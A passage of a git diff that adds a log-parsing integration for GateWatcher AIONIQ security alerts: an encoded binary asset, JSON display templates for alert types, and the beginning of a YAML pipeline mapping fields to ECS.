z>UYkw%Ge5GncPkdRA+FtIN$YlY}hu1OcEj_nBzN<3Il^Gb%)b7D<f|!X6Cei8TH|j
zkKcPjLaPlo1ti%vWV7O$a@%;74_#V*r`rQAo*06HS~sNF2prX`9qoT_obY%A@}bEl
z-O+LCKb^~x;T?JKE?lbp6g)Rc3+kMJG_#827^Rg7FJ!mfT;_>oef?^iIIFv=$od=y
zbQB2W0&R2aKOL(1H3wg+YqSWhB9gE06~Esn=1Au3`T>XBrf(tpA9AfX*0mkc_f9%z
z;jjo)RZ?eZajp7+Pp_SPkk%@zBF5lqTf!>V1LMe`lG7~wfRE2z)(TAVf`s@Q2nbak
z>vo|qNfxcT1BaLKQFBB^#voYBPVEUb8|A+gHZ5uytJ>?Du^M?dENwD=N|LnMgkE2z
zfJG0zng-+$EI)=uorBjmd#a-j+xfJZXr9l-h{v4}a2UNgf(mc~d5UzNp~5boTIf#G
zpClV{a+qO&V>aR*=>zACiLJF^knX30r}Vs*1cb(O*b`+v^R3r9%2&!_neFsdy8qKX
z^ip_A&0DHSoPIYDc74@!7u1sz46d&17jOzZG;xr&`x>K%jls6QBtUPE>c-W$9vHf9
zEiNvtv`WN_|2IaU$2|FC0G3;ue~}B$3b9Ja&VE}VvL(ygNn1xA1gn`k%>cKg$PRSc
zTUnNB7b#nLPq+P%@A_BWN&U+koIbdndq+oGb$gy&n|6QDOJBRzLgDOLVCBy4(+4sB
zY<jrWm6~3Fi4ly@AOh2ym0`QZmVG9i{%mS%2_=huOQec<;#4}*ko(@nb3@Rl;cn+;
z(yg(=Or3XmIaR&RzaFxM+)LBK6)qM2dQv_Yum4Et;P-J}nQZYm3wOfiV=`~zzF3gx
z#P(;&X{+-h)|5h%_bwekwq#ypmyA|fs$aG(>L&!5oJzx<u!*-rl6kZ%l8RCNPRJ?|
z=NUumYFZAOzG5AK2P(HSXN4HnIi~7=ubq(p;p)&}PHLyl`lM*aTHsjF3ZE=<mITL9
zu3s+1PoL&4%gJumYlh9qP7-m7B3)o=$*sqQ^Y*$<R$H|qDAueI6XL~cE!`awn0cD*
z>TT0<g5CdeYpxqD2W&z|kNx^1JLvlol($vEwgOM|g>$6CFCP-RKg$1S`l*(}Yod&z
zRO8k$d90=Ws>E2;KziRhDso?2+%Ggw@>WHVkz}3>nF~Q9tbdkXp(9Y;i-`~dJk2^#
zMz9>UAxcwwpiER*5r0y%Xw|GuXm9#P6oLd$l0Ax{xGDxn@S_G%+y};oa_B$$WYo^j
z&#cNbnJsnl={6%)FA1okcF>z*<>xy>zke8MV)^AmILX_97(+VJu8CH6uD>#zB%7`J
z8uZ@KmP~b6Pw#w#DrH6WOeii-6u$tt8|?oRk4Lrkxf$Wdp4u5xjsj2arMq)^-;5h%
z6JT=TvU;`GTSk8)uS#o}mVc1xBMuTlL>nqwnIc#!IfUZJfwt+ZR_&~_=WmNnE9S#)
zxmXw>+`B3D`1SqqtWAKdJnPk;FGsWd0t0B8Wcyy-+%4|({DyjUnK}x=d780^LYwH2
zTc5;gEDSwknry`CmY30?fD)}8xkun<>}8*^3Pq9USHP#*Ydl1yiY`8;w4dV0AdElj
z_z_W!mXjD?70ucEzW^B&=Igw#5iCD|bN3;=5qJY|DdqAfa+#iQkxt!LoZOn!Z6$bG
zFzFaj#rz@*?FVUw{L9_Sk>XM(Ee*_;n$&KPb7srU`%a|uWwsXBh}q(pr1k^<j@drJ
zJwuhTd*RT$O<klK{Q`@XzN5KJ&j*Qm*IxHSr1kk?wSP{<`->d%goh61T=$1DyDy%k
z@?xT?zh9wJ{d6wf^Q~f~etKUC<~gGL=mcgSxFtxrRXKV>ppCJSR+E+qR+zK`$P4l&
zEhmzAc?38Nd|76P3?3BRGg_Irr^@{c!sAcPhl?zhd+*I<dj6a!=k^-lSCOi@RM!`a
z)&4m@dM#G^#(^((rn`4~sSkKPQCrU?h@M=!`)gM9eZ#h6BC*H>r-?w)j}tYTJED<d
zC<+fpfD=SgKo0{)Wj2O%5VMEO7#OWi6|3C4;Jo|Pe7VqKxp!|a)AN2Hh4d=Sel7O2
zzT60;1yHE;4d!V7M>6Yo0B-_b3jBXa&m|Rnx?MeAbc+@}Fm&?U3vEof5`H=RkzpLp
zJwzljIU%ztlcod(Z+6VVG0BaU$}@+?*;76j79};GF1A?i-IL4o{9nK$y&Cv+%)(r-
z>8r(X$4o<9Bg3BZ@Qz%%`!Lcr;1$5l62A)c*woaQa+#j*(b{^bc;Z_Nfw+8ZP{DlL
zPYq1|krIaSF<kI@xnOE&`p#0aG!0tT@Kh*;gF|hpH4g!ck!}VqGHE31Iv<|&g@%dK
z<3XtVvq64G?7}w_RTJL|tf5kA&8F6zDusjdTKH~pW?hq+Z2_(_xN9;T+?klwnIjwI
zo#3Z{3q1Dsm9V;hw0!qWvNH3Ouwv30&brPAkeZNgl5{E3M2k8OPx;0wd@F^6r?TPV
z-BS8qU=(R7@O+|rn9kN9zc}kUD~rjUD%sGyJH1(!S?j&oCg6FPZJYFkyArcHb1e6(
zo4j-HL}~~AW~@41h-CT`%v-{WJ(#g<dhKp`pGLYtuvwDYQfm%on>S3ADn}dVS{d^t
zUnpk%l5Hrx4>*Ce1bCs~7D*e-xn)_Gw>FnQQSyWHCRuu_GEixAomU{e6lu?@rB{FB
z<n)2Wvd$2#nRT5ez17Srz&}m;y$M?_1i}I+RR<=P1o?X`8isJaqHwE<+5NR@8a)fd
zHIVg7zlT!$fs;s0K#$->5*H&Dx4O=jY--KaWCPyA6QM1&<|5z)f`RJn<eeoyKd!sc
zkjwPQqWO-u2_6yrd+99q5+;N-$C&Vi$*f<!2j|kUEXNH7zBR}fnlfvTPge&Tk7yYU
zOTKU<>z92Om)?zZlqh-K1-w*Jm!fcSQJc%VtjnJ)`N4(_7qdaW6SxioGvAv?@0=m=
z2YCrz0^AC^8~FNMDwQOJRWkx8&Sw4UJqm(pV6Dtvj<hW0{cxK)hDtVMjd|UpVaXQ?
zrEqXt)^+wFjSw}Y=75(8o`bj$u{ay#vsu^avwrDBiP1(gv=-nR#73Zh(iiSaOzY`m
zu{wnGbHLSLAH(P``9dXGnFU5zF=@?|!olrru5%da{P<0^#-t-n)?S>Z*wB@}C0{sE
z3J34brq_QL?;ivkM@kV5KYban8EHL1W?44KFUh*jYRMNGq7bz$y>?b+7X!Bnc9(o%
zTVh&IAFY{nE9Cuqkd|Tg0jjfyN{m>tG7FHf9>t=}x&tyR04w7Y#PgkVzAe4>a48&|
zZS?CeRgX@V{NVjrzw%qi-7TpQdtIGGCyOrudXUy;gZ$ELkYBtg$m7~BoG#BC_H%R1
z1G8<e^8%!oAdR+=+d5@KQ;B&!?a=ypz>k^P0i;h1`(23?_d+ME$?5>5aPXnFAirN`
ztw_&RRIhb%QIIcAhVw&4qr`9}o>H@YiR=8f!J#<U^(cAWOjJqV4QxzTtNAw9xwI|F
zr?ak;Qk^HRWYcR~V;P_hNqZ-K;o-!*P9M4EEiIV+0<cB!NqPU>xfHET2&>)(9}X6?
z)_ylZun0I0crK7_Q^!!r7e?mOy-fJRRLK|im%_nsWYg>J!uvx=1HcrpRB)}}b%^I6
zT?ky*7UWlCgZ!#&YR#goI&6B?6|*+^P|d=Nw)EOln4JeaU+`d79epJmN+fnpm+)QZ
zg))05(h|)6l(76z5)Ph2gcW%y#mVJ<^|sKtaimKWc_i(vsWm6t(rb&Q>cG59XqKu2
zr%JwXPbnPyuO+VYTflCdI|7^lIp9*HTLrHLZa}&W>AXd=Gi$R!epNQeuWAeOt&4(u
zs>OBM)LBaEZmJH<9(SF2q+5}ifjuQ(C?+O$+Tq}9kzR&bAJV@TlW_0}aZWU?<}y7g
z;8noS0M{A}3jPS=zl)XLfrW67%ebngCDU}VH{T=a0*i#(+JV);av*Ebkb$D$VT)u)
zh6IlooRZm$Id{r=KN+HFXMUDUX0kYS`g&d+nVt&_{(xxs=I<2Cy?>LK*lFy~boXkc
zPXgBgzl`yzVx>3f9XwYF3t(-kOQCd;m)-~5LL}Mo8Q_yRcYkqa`+~|BEZ5boP3g=f
z-uz{9?tFQ_(WFiw3#<Z`5DnC5HaMb4s^l<GG&m+W1q?@?8zC@lP?1>`Fq6uP{`?0p
z0%31KdY8dxf!`>Wdy`z&Q;}86wHd<jZNP5>1HhY$<=&)K;9MsxfOf8sl<FiEydLST
zM7gbR1OJTo-z--97pxn;Hr?$!toL#qF^R30*;0$9`z`?%0j=?`i->fXT4Q22U<@c>
zHiJ|JO2Gd-bxi?lfOWtr%zl?J{7}*FOjK8&+$+7(-~+%F7{3MlOR>_M=%yuv^+TJa
zX>$|sa=d@5NjCvS%sy!FrSZ!2!_(|LXOhKh(%mUT8%(r&vv#0e(khb{6HRVe7L!&B
zk?ctjfB)$3e;A%fV6G*88GIMB-zrx6b|t3vgx*z3)#~q>^iIsa3H(a2()UQRG6`Wl
zezS0eBS@c55d1c9Be2@c{sZ`g(C%WTcQn}^F~PT7pOz0-VwUyJHOVZ6S=P*&WA6(<
zf-=rcV1AXs&jZgl_-h}Ae>NKKNMxcPv#2js?)caZn0*jfiT7`&I{V*6_9iE*31K}2
zab<d1iPS;g3S2=X-2ZXl(*(ic;`FwpHR8-do!bol1TZuEEf<Ej5BZ&mF~(TkvgHC7
z`o9Kl!tBp6`#`bUKbEY_QzJOn7oZdlR<hyB-Jq>F*Aa&@w*YG~PGuvxm+54yJUuLR
zodt^|bY3KAGw1d%U3vNN#N@#w6wLIjlG%HRx)$~#{c#csCWLkRq{Xn6Y-lta<i8G-
zWVQmS3%C)H&Ib8Y+044*rRsoBR_pXI?hCVRsWnBSvWk}=Wo%|<?|fHSea4<=x@#%Y
z+ktmrc1mXNqcYoHVmR4b31K~LZ)-LiuG)#T4M}mUN!0#gR>%hV*=*DL$x`KLvbj!g
zJ;$=H^90hxit<_2Me4YB>Kv6!$)&s7gx-YoOF)ZBf8wRD42L@t4?ZERGxfHLzGOpV
z*&yEs3?XHK%YYvPR+;w`ZR(gP`9jj%dpbtymkm^0+9O>hxIt2RkvbkY*GMau?#=?Q
zM*1~iIcEPLvyTl|`jWg=LRe>kxO`!@<O}y?gZwv%royZTdN6ywq;xj5W;E;avn4-R
zPFCy5ahy?~^{XDl1%`Bu;5m{iS=agC;@0ygOXVZyKp42G4fHCc-vrt*`v_)#U99#G
zCOae{tg{`~OlJM+yW#(}cWys+RdpQyeAn7%X4;-<%Vp@aXIh(b6UwE9wzQ^31hM#l
z!~_kX5Bd-IV0`n*=$lXaqz@V~hWLU!U@)L!DAGF@MW8KE0%ba<m3G?c+|D_Budfe#
z50*<JA(UQb|B{vLb8;@pK5Ko>_xD@B_4~0CDN4EqX&bNwQ8Z)gbPcZmr&^EpnrZ0e
zGoW>+q(n*wCyUXGI!SW4Z_{F-Z&t7x#{Mn#&)fOF!}ZLlfpxar#A4E8V@qOdJJLa5
zC2$pR4{#fzcLuoXG>DIeR=1gk{!NGh=|<p-K(Q#c-WgPD;(RUv{fS{Uuz4BwgGfIF
zhOmEEr7zSwf;F(tzMW1-dP}mAgSMYQ8mG(xzor7$21KVBTN4$y>f<OMhE}JUu6Riy
zb`V!$Zxd<}Xg9Nw6U_yydz0M@Uw8~J*wR?k7+E9x2f+6!PX+wi@Qb50tZHC=rqC)z
znM_9}o3XVA`$?ozl+_TftH8A$F<U9FZVj#vsnyP4V`R7Nw~*E#?gZ8WU5a$Psn*nm
zthR>xHZ2CepyVF`-;jMm@H5OWkLG*payvD!&e6gvMrp>@B+_o|zaX6kE(flsY)^kP
zV!9buOf8D7G}ym7pX?p33$j)BZZaKtZ7>@-Bzv&RdAk!BLbRLN$oOP&VY$}J8@DcK
zHdd_x?x(E0a1-`E?4Oe7kF?YC6ZJ1&1MA!_ymW-gV${vpnn2ot{a2)E%JMBY0QZ8{
z3HmU3Gqz@$1FO5|Q<K+oX@h;M4!hfZnivNtPZ(?gZUpjXY)v<_k(u)yT*Hlx{mpD-
z80jwAKSugCb{BZq@RKahcZ~639oPJnO!Y1JR41>HgncE_cPNiuw1B0+o4`ZBlh|XR
z@pf-dy|Y-}x2O>Au>D<ND`j^4PT)7d&SbZ{DNUa&o;z<8>au~&3zgEPl{@=A%Hv!G
z<|UkdMP59f77R=to7q{b>Ka%V0JtC!v*mKS+xC5xau@`TVV*)f0=#NCm8W$2c)o95
zXU{Jm*c{yHTtSxIhx8zDWp%&)VfX{EOQucGWV^HboPd6K!Ir3$mbi5NZ^M27*hE=w
z=P>Xv$-f7WwdeWoSp(}r1lPb82?uw(iwWT_Lb$gASBo+kb-&>;;3?o8q0=;Cr#-b}
zUj8c&vraS`k)l{ejNd|f09Z{~74@*-QP8v42Z7^+FxBqtI;-y1P;+Y*@_eCES`4g0
z+9vz!wpSzdfHB|+%tMI%B&T-1w^mg(urBb$m~DuJ5U_8M^nlACbBnUN=W*b1;BUYy
z*vC+qqLFpmQ_s%3$zOphqbP=n@qWrSZP!tzk@R8z3-mbBZt$Ci>0nRWo}FE^sB`kv
z)1OG)3^%umZnux}oZmooENi9gb=Y5%z0r~=tF69;{V3)Ug5JRt?cSbRRn@?{=-kDC
z6ob9oaJQwe0&9WGC`%H*iTN|qGvHS-?-Ddcmi6Wvyxs$s)WH5SA>50-m9nJs0A+sD
zF~b4b&jI@#<H1lA<A#o<LS+@yk5XZ>6l6#2M%86|5wHeWk8~|?BlcC*`=@~u*n5FL
zDr7rc^iG2ET2a-&y6COd*r)`VMF@oJjqh<;8DgYbj04!ORZ8L?;Qg}46U^jx=Xkzv
ze!;7;F(Ng{^A*H+i=^8r70(rv%`_U6HRYr1(}veAovNB?9OHkLQK_z@r9s(Cv0F$j
z%Ggw>Mh;9-*0F!t@F$t=1P);eWqrli%(FG9YGBPjThVu0Fl5eqLxgw}F>J%Wqgp_H
zKtJ{Y;O~ZANG}OaVrB`NX?J$dn{D%9truAqC1uzR!Bwer7uOTQDy4L_rKJ_XbOwOt
z=6ioNLiJc@T+cPvn2^0c!DBMpC0<XE%M|T=Z|(Ngz^d&%7bwdjF=q67R}kaPlD=g4
z3T19rU$qe51zyDLLE2~hhF~hej6&!fo!vEWvg=!ojiD&>3CkE^O0lq)#F$+vd#UXq
z#OEj*V=M;N%D%~Ee9FKKFbhn{eyxJk(-H?NNaZ!8YGBp&G2x{Uvb-pkWHH`g`*x%)
zlw1A_Du4yUA(bf-+a<k>{kCBy*t52~orMc~;}hF2`b9T9usKU9^+_5K43N?y!&<>6
zq)oDKwzP<{vriW|j=cwa4``3XD;1=AHKb}_)%FQ(DeJVLuRq!;Luv$jjbVdBxLqmT
zU}=c=x8Q0U_6Pep!>cLF4pf2YuArNsXFLB-Z|?=^N-kY`duU8g$7nYkLLYV(>;Z=`
zV*5IzTLsru?qQQM@Sayn>J8h^2>r82X;%z7g<Vv^^SVh!4XoPEh8vV1a|jLD4J+KF
zRIEkXfW5)eT<|!a5x+TN*sn78>!9togLDYUv2%yelbsUuf}MylZ_n;JXDVZOU~?=|
z3W6Bzm_o>~qo6OvxP+ou5$tOn!nN3|g1x?qUAY=LWuw=_z+TKAh48$c#%y<micYVW
zkMlwuIIn?K+h@DDw`3~vNEwLk7hGk9RmtfVg>b!6y2jEayg$GkC|k`R!G7BzydnFz
z;gIZcLKww<S9X!4Bs*D3RhmEoj6DambjCG+T<yxK{4N7jIZQ!i4?|g+ODza4Ul%n8
zT4~7kCBU%kmP2S^w^Ww%Sy{ojs6IOZN%l#@0mG|7+FPXbLI`0T=wWijEFYWQQM-CI
zuxdNc6j-!EESxfhkSV2pp{p&eH2%EcT41HiSXitUefYq9Pz9nBmX6Avuyk5*f^y7Y
zk5{jo1Wum$ephYmRqn`90jnQaqH=ey-_qhLwP3N!V>ruHmg-qXnc9)gP)r{jW55f*
zTS5nr_LI`6anFzkg<d!B<;T<WwSuaFRoev!vCIk~;Y@S8YOqkSCP|l(($&C-q+v^!
zV9(_xebhYB$CyiVN+x{Zd4G(@l0Ahq28`Ms1x6)}qHxgmJK%2R_7wr;4xt#E-C4(=
zYGBoN5kpLtVp0f7MKnZ7!BW7Ewj0=&hY*&duo%C0@OLgN|FQ}&gGiUY4?gxRAWBtL
z`H7x&sl<A=XC$4Jeah&RqzU0MOYasbO$7U-Lg)g?b|EOFkgSl8b!srpSNkt-Fft?C
S^g9s%0000<MNUMnLSTYm8i48m

literal 0
HcmV?d00001

diff --git a/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json b/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
new file mode 100644
index 000000000..aa6f3ba2b
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
@@ -0,0 +1,186 @@
+[
+  {
+    "value": "Metadata {network.protocol}: ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "network_metadata"
+      }
+    ]
+  },
+  {
+    "value": "Authentication {event.module} : {gatewatcher.history.name} with {gatewatcher.history.ip}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "network_metadata"
+      },
+      {
+        "field": "event.module",
+        "value": "history"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {gatewatcher.syslog.message}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "system_logs"
+      },
+      {
+        "field": "event.module",
+        "value": "syslog"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {gatewatcher.notification.title}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "administration"
+      },
+      {
+        "field": "event.module",
+        "value": "notification"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {gatewatcher.beacon.hostname_resolution} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "alert"
+      },
+      {
+        "field": "event.module",
+        "value": "beacon_detect"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {gatewatcher.matched_event.file.name} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "alert"
+      },
+      {
+        "field": "event.module",
+        "value": "retrohunt"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "alert"
+      },
+      {
+        "field": "event.module",
+        "value": "ransomware_detect"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "alert"
+      },
+      {
+        "field": "event.module",
+        "value": "dga_detect"
+      }
+    ]
+  },
+  {
+    "value": "{gatewatcher.nba.signature_severity} {event.module} : {gatewatcher.nba.signature} {source.ip}:{source.port} -> {destination.ip}:{destination.port}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "alert"
+      },
+      {
+        "field": "event.module",
+        "value": "network_behavior_analytics"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} : {gatewatcher.ioc.signature}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "ioc"
+      },
+      {
+        "field": "event.module",
+        "value": "ioc"
+      }
+    ]
+  },
+  {
+    "value": "GCenter {event.module}",
+    "conditions": [
+      {
+        "field": "event.module",
+        "value": "sigflow_stats"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} checker: {gatewatcher.malcore.state} file: {file.name} hosted on {url.domain} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.module",
+        "value": "malcore"
+      },
+      {
+        "field": "url.domain"
+      },
+      {
+        "field": "file.name"
+      },
+      {
+        "field": "source.address"
+      }
+    ]
+  },
+  {
+    "value": "{event.module}: {gatewatcher.sigflow.signature} (sid:{gatewatcher.sigflow.signature_id}) {rule.name} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "alert"
+      },
+      {
+        "field": "event.module",
+        "value": "sigflow_alert"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} of type {gatewatcher.shellcode.sub_type} detected ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.module",
+        "value": "shellcode_detect"
+      }
+    ]
+  },
+  {
+    "value": "{event.module} with {gatewatcher.malicious_powershell.score} obfuscated chars ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
+    "conditions": [
+      {
+        "field": "event.module",
+        "value": "malicious_powershell_detect"
+      }
+    ]
+  }
+]
diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
new file mode 100644
index 000000000..8f53ec153
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -0,0 +1,768 @@
+name: gatewatcher-test-ecs---clem
+ignored_values: null
+pipeline:
+  - name: json_load
+    description: ''
+    filter: ''
+    external:
+      name: json.parse-json
+      properties:
+        input_field: '{{original.message}}'
+        output_field: message
+  - name: parsed_date
+    description: Parsed date
+    filter: ''
+    external: null
+  - name: event
+    description: event field
+    filter: ''
+    external: null
+  - name: source
+    description: source field
+    filter: ''
+    external: null
+  - name: destination
+    description: destination field
+    filter: ''
+    external: null
+  - name: observer
+    description: observer field
+    filter: ''
+    external: null
+  - name: network
+    description: network field
+    filter: ''
+    external: null
+  - name: http
+    description: http metadata fields
+    filter: ''
+    external: null
+  - name: file
+    description: file field
+    filter: ''
+    external: null
+  - name: dns
+    description: dns field metadata
+    filter: ''
+    external: null
+  - name: url
+    description: url field
+    filter: ''
+    external: null
+  - name: ecs
+    description: ecs field
+    filter: ''
+    external: null
+  - name: user_agent
+    description: user_agent field
+    filter: ''
+    external: null
+  - name: version
+    description: '@version field'
+    filter: ''
+    external: null
+  - name: tls
+    description: tls field
+    filter: ''
+    external: null
+  - name: metadata-flowbits
+    description: metadata flowbits field
+    filter: ''
+    external: null
+  - name: smtp
+    description: smtp field
+    filter: ''
+    external: null
+  - name: email
+    description: email field
+    filter: ''
+    external: null
+  - name: smb
+    description: smb field
+    filter: ''
+    external: null
+  - name: nfs
+    description: nfs field
+    filter: ''
+    external: null
+  - name: ftp
+    description: ftp field
+    filter: ''
+    external: null
+  - name: tftp
+    description: tftp field
+    filter: ''
+    external: null
+  - name: ssh
+    description: ssh field
+    filter: ''
+    external: null
+  - name: krb5
+    description: krb5 field
+    filter: ''
+    external: null
+  - name: dhcp
+    description: dhcp field
+    filter: ''
+    external: null
+  - name: ftp_data
+    description: ftp_data field
+    filter: ''
+    external: null
+  - name: snmp
+    description: snmp field
+    filter: ''
+    external: null
+  - name: rdp
+    description: rdp field
+    filter: ''
+    external: null
+  - name: rfb
+    description: rfb field
+    filter: ''
+    external: null
+  - name: ikev2
+    description: ikev 2 field
+    filter: ''
+    external: null
+  - name: sip
+    description: sip field
+    filter: ''
+    external: null
+  - name: dnp3
+    description: dnp3 field
+    filter: ''
+    external: null
+  - name: dcerpc
+    description: dcerpc field
+    filter: ''
+    external: null
+  - name: mqtt
+    description: mqtt field
+    filter: ''
+    external: null
+  - name: malcore
+    description: malcore field
+    filter: ''
+    external: null
+  - name: sigflow
+    description: sigflow field
+    filter: ''
+    external: null
+  - name: flow
+    description: flow field
+    filter: ''
+    external: null
+  - name: shellcode
+    description: shellcode field
+    filter: ''
+    external: null
+  - name: malicious_powershell
+    description: malicious_powershell field
+    filter: ''
+    external: null
+  - name: files
+    description: files field
+    filter: ''
+    external: null
+  - name: history
+    description: history field
+    filter: ''
+    external: null
+  - name: syslog
+    description: syslog field
+    filter: ''
+    external: null
+  - name: notification
+    description: notification field
+    filter: ''
+    external: null
+  - name: beacon
+    description: beacon field
+    filter: ''
+    external: null
+  - name: retrohunt
+    description: retrohunt field
+    filter: ''
+    external: null
+  - name: ransomware_detect
+    description: ransomware_detect field
+    filter: ''
+    external: null
+  - name: dga_detect
+    description: dga_detect field
+    filter: ''
+    external: null
+  - name: network_behavior_analytics
+    description: network_behavior_analytics field
+    filter: ''
+    external: null
+  - name: ioc
+    description: ioc field
+    filter: ''
+    external: null
+stages:
+  parsed_date:
+    actions:
+      - set:
+          '@timestamp': '{{json_load.message["@timestamp"]}}'
+        filter: ''
+        name: set
+  event:
+    actions:
+      - set:
+          event.kind: '{{json_load.message.event.kind}}'
+          event.module: '{{json_load.message.event.module}}'
+          event.dataset: '{{json_load.message.event.dataset}}'
+          event.category: '{{json_load.message.event.category}}'
+          event.severity: '{{json_load.message.event.severity}}'
+          gatewatcher.event.id: '{{json_load.message.event.id}}'
+          gatewatcher.event.created: '{{json_load.message.event.created}}'
+        filter: ''
+        name: set
+  source:
+    actions:
+      - set:
+          source.ip: '{{json_load.message.source.ip}}'
+          source.mac: '{{json_load.message.source.mac}}'
+          source.port: '{{json_load.message.source.port}}'
+        filter: ''
+        name: set
+  destination:
+    actions:
+      - set:
+          destination.ip: '{{json_load.message.destination.ip}}'
+          destination.mac: '{{json_load.message.destination.mac}}'
+          destination.port: '{{json_load.message.destination.port}}'
+        filter: ''
+        name: set
+  observer:
+    actions:
+      - set:
+          observer.vendor: '{{json_load.message.observer.vendor}}'
+          observer.product: '{{json_load.message.observer.product}}'
+          observer.version: '{{json_load.message.observer.version}}'
+          observer.hostname: '{{json_load.message.observer.hostname}}'
+          gatewatcher.observer.uuid: '{{json_load.message.observer.uuid}}'
+          gatewatcher.observer.gcap.version: '{{json_load.message.observer.gcap.version}}'
+          gatewatcher.observer.gcap.hostname: '{{json_load.message.observer.gcap.hostname}}'
+          gatewatcher.observer.log_format_version: '{{json_load.message.observer.log_format_version}}'
+          gatewatcher.observer.gcap.ingress.interface.name: '{{json_load.message.observer.gcap.ingress.interface.name}}'
+        filter: ''
+        name: set
+  network:
+    actions:
+      - set:
+          network.vlan.id: '{{json_load.message.network.vlan.id}}'
+          network.protocol: '{{json_load.message.network.protocol}}'
+          network.transport: '{{json_load.message.network.transport}}'
+          network.vlan.name: '{{json_load.message.network.vlan.name}}'
+          network.community_id: '{{json_load.message.network.community_id}}'
+          gatewatcher.network.tx_id: '{{json_load.message.network.tx_id}}'
+          gatewatcher.network.flow_id: '{{json_load.message.network.flow_id}}'
+          gatewatcher.network.timestamp: '{{json_load.message.network.timestamp}}'
+        filter: ''
+        name: set
+  http:
+    actions:
+      - set:
+          http.version: '{{json_load.message.http.version}}'
+          http.request.method: '{{json_load.message.http.request.method}}'
+          http.response.bytes: '{{json_load.message.http.response.bytes}}'
+          gatewatcher.http.http2: '{{json_load.message.http.http2}}'
+          http.request.mime_type: '{{json_load.message.http.request.mime_type}}'
+          gatewatcher.http.accept: '{{json_load.message.http.accept}}'
+          http.response.mime_type: '{{json_load.message.http.response.mime_type}}'
+          gatewatcher.http.hostname: '{{json_load.message.http.hostname}}'
+          http.response.status_code: '{{json_load.message.http.response.status}}'
+          gatewatcher.http.http_refer: '{{json_load.message.http.http_refer}}'
+          gatewatcher.http.accept_language: '{{json_load.message.http.accept_language}}'
+        filter: ''
+        name: set
+  file:
+    actions:
+      - set:
+          file.name: '{{json_load.message.file.name}}'
+          file.size: '{{json_load.message.file.size}}'
+          file.hash.md5: '{{json_load.message.file.hash.md5}}'
+          file.hash.sha1: '{{json_load.message.file.hash.sha1}}'
+          file.hash.sha256: '{{json_load.message.file.hash.sha256}}'
+          gatewatcher.file.sid: '{{json_load.message.file.sid}}'
+          gatewatcher.file.gaps: '{{json_load.message.file.gaps}}'
+          gatewatcher.file.magic: '{{json_load.message.file.magic}}'
+          gatewatcher.file.state: '{{json_load.message.file.state}}'
+          gatewatcher.file.tx_id: '{{json_load.message.file.tx_id}}'
+          gatewatcher.file.stored: '{{json_load.message.file.stored}}'
+          gatewatcher.file.file_id: '{{json_load.message.file.file_id}}'
+        filter: ''
+        name: set
+  dns:
+    actions:
+      - set:
+          gatewatcher.dns: '{{json_load.message.dns}}'
+          dns.answers.data: '{{json_load.message.dns.answers.data}}'
+          dns.answers.type: '{{json_load.message.dns.answers.type}}'
+          dns.response_code: '{{json_load.message.dns.response_code}}'
+        filter: ''
+        name: set
+  url:
+    actions:
+      - set:
+          url.full: '{{json_load.message.url.full}}'
+          url.path: '{{json_load.message.url.path}}'
+          url.domain: '{{json_load.message.url.domain}}'
+        filter: ''
+        name: set
+  ecs:
+    actions:
+      - set:
+          ecs.version: '{{json_load.message.ecs.version}}'
+        filter: ''
+        name: set
+  user_agent:
+    actions:
+      - set:
+          user_agent.name: '{{json_load.message.user_agent.name}}'
+          user_agent.os.name: '{{json_load.message.user_agent.os.name}}'
+          user_agent.version: '{{json_load.message.user_agent.version}}'
+          user_agent.original: '{{json_load.message.user_agent.original}}'
+          user_agent.os.family: '{{json_load.message.user_agent.os.family}}'
+          user_agent.os.version: '{{json_load.message.user_agent.os.version}}'
+          user_agent.device.name: '{{json_load.message.user_agent.device.name}}'
+          gatewatcher.user_agent.major: '{{json_load.message.user_agent.major}}'
+          gatewatcher.user_agent.minor: '{{json_load.message.user_agent.minor}}'
+          gatewatcher.user_agent.patch: '{{json_load.message.user_agent.patch}}'
+          gatewatcher.user_agent.os.major: '{{json_load.message.user_agent.os.major}}'
+        filter: ''
+        name: set
+  version:
+    actions:
+      - set:
+          gatewatcher.version: '{{json_load.message["@version"]}}'
+        filter: ''
+        name: set
+  tls:
+    actions:
+      - set:
+          tls.version: '{{json_load.message.tls.version}}'
+          gatewatcher.tls: '{{json_load.message.tls}}'
+          tls.server.issuer: '{{json_load.message.tls.server.issuer}}'
+          tls.server.subject: '{{json_load.message.tls.server.subject}}'
+          tls.server.hash.md5: '{{json_load.message.tls.server.hash.md5}}'
+          tls.server.hash.sha1: '{{json_load.message.tls.server.hash.sha1}}'
